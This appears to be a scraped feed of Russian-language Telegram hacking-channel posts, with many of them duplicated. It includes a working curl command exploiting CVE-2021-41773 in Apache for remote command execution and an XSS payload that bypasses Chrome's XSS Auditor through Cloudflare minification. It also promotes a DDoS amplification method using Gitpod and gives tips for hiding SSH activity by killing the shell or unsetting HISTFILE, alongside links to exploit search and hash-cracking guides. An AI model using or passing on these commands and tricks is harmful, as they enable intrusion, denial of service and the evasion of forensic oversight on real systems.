Forwarded from Кавычка (crlf)
attacking_bitrix.pdf
3.6 MB
Уязвимости и атаки на CMS Bitrix
1. Особенности
2. Уязвимости
3. Методы атак
Приятного чтения!
1. Особенности
2. Уязвимости
3. Методы атак
Приятного чтения!
Недавняя CVE-2021-41773 в Apache 2.4.49, это не только выход из директории с чтением файлов, как многие подумали
curl --data "A=|echo;id" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
curl --data "A=|echo;id" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
Forwarded from Life-Hack - Хакер
Telegraph
Радужная таблица
#Обучение Радужная таблица (англ. rainbow table) — специальный вариант таблиц поиска (англ. lookup table) для обращения криптографических хеш-функций, использующий механизм разумного компромисса между временем поиска по таблице и занимаемой памятью (англ.…
Хороший материал по захвату доменов (поддоменов), когда о них забывают:
https://github.com/EdOverflow/can-i-take-over-xyz
https://github.com/EdOverflow/can-i-take-over-xyz
GitHub
GitHub - EdOverflow/can-i-take-over-xyz: "Can I take over XYZ?" — a list of services and how to claim (sub)domains with dangling…
"Can I take over XYZ?" — a list of services and how to claim (sub)domains with dangling DNS records. - EdOverflow/can-i-take-over-xyz
Быстрый поиск по эксплойтам и полезным программам. Enjoy!
https://sploitus.com
https://sploitus.com
Sploitus
💀 Sploitus | Exploits & Tools Search Engine
Sploitus is a convenient central place for identifying the newest exploits and finding attacks that exploit known vulnerabilities. The search engine is also a good resource for finding security and vulnerability discovery tools.
Не все йогурты одинаково полезны!
Например, настройка в CloudFlare по сжатию страницы ломает Chrome XSS Auditor, что позволяет с легкостью его обойти. Достаточно указать вектор, в котором содержимое атрибутов не будет обрамлено кавычками, Auto Minify CloudFlare все сделает за тебя, а Chrome не увидит, что вектор атаки передался в URL, так как содержимое на странице будет различаться от того, что было передано в запросе.
<noscript/src=//html5sec.org/test.js></noscript>
вжух =>
<noscript src="//html5sec.org/test.js"></noscript>
https://twitter.com/i_bo0om/status/895896778914004993
Например, настройка в CloudFlare по сжатию страницы ломает Chrome XSS Auditor, что позволяет с легкостью его обойти. Достаточно указать вектор, в котором содержимое атрибутов не будет обрамлено кавычками, Auto Minify CloudFlare все сделает за тебя, а Chrome не увидит, что вектор атаки передался в URL, так как содержимое на странице будет различаться от того, что было передано в запросе.
<noscript/src=//html5sec.org/test.js></noscript>
вжух =>
<noscript src="//html5sec.org/test.js"></noscript>
https://twitter.com/i_bo0om/status/895896778914004993
Forwarded from Этичный Хакер
👾DNS атака: как это работает
В этой статье рассмотрим что такое и какие типы атак имеются на DNS.
➖ https://telegra.ph/DNS-spoofing-kak-ehto-rabotaet-06-09
#less | 💀 Этичный хакер
В этой статье рассмотрим что такое и какие типы атак имеются на DNS.
➖ https://telegra.ph/DNS-spoofing-kak-ehto-rabotaet-06-09
#less | 💀 Этичный хакер
Forwarded from LEGION | Cyber beavers
Telegraph
DDOS С ПОМОЩЬЮ GITPOD L7 500k+ rq.L4 tcp 1gb/s
Всем привет Расскажу о способе как усилить свою атаку в разы, бесплатно (не для всех скриптов подойдет) ИНСТРУМЕНТЫ1.Аккаунт гит хаб.2.Аккаунт на гитпод.3.Браузер, чем больше, тем лучше.4.Скрипт который я дам (можете юзать свой ) ИНСТРУКЦИЯ 1.GithubРегистрируемся…
Если ты подключен к SSH и хочешь скрыть, что делалось на машине, полезно после всех действий выполнить kill -9 $$
Это убет собственный процесс, а последние команды в .bash_history не запишутся.
Или можно ввести unset HISTFILE (с пробелом в начале), чтобы не писать в историю вовсе.
Это убет собственный процесс, а последние команды в .bash_history не запишутся.
Или можно ввести unset HISTFILE (с пробелом в начале), чтобы не писать в историю вовсе.
Forwarded from Life-Hack - Хакер
Telegraph
Взлом хешей с помощью HashCat. Часть 2
#Обучение Где: -m 100: режим хеширования SHA1 -a 0: режим атаки по словарю hash.txt: текстовый файл, содержащий хэш в совместимом формате passwordlist.txt: файл словаря, содержащий пароли в виде простого текста Взломанный хеш: b89eaac7e61417341b710b727768294d0e6a277b…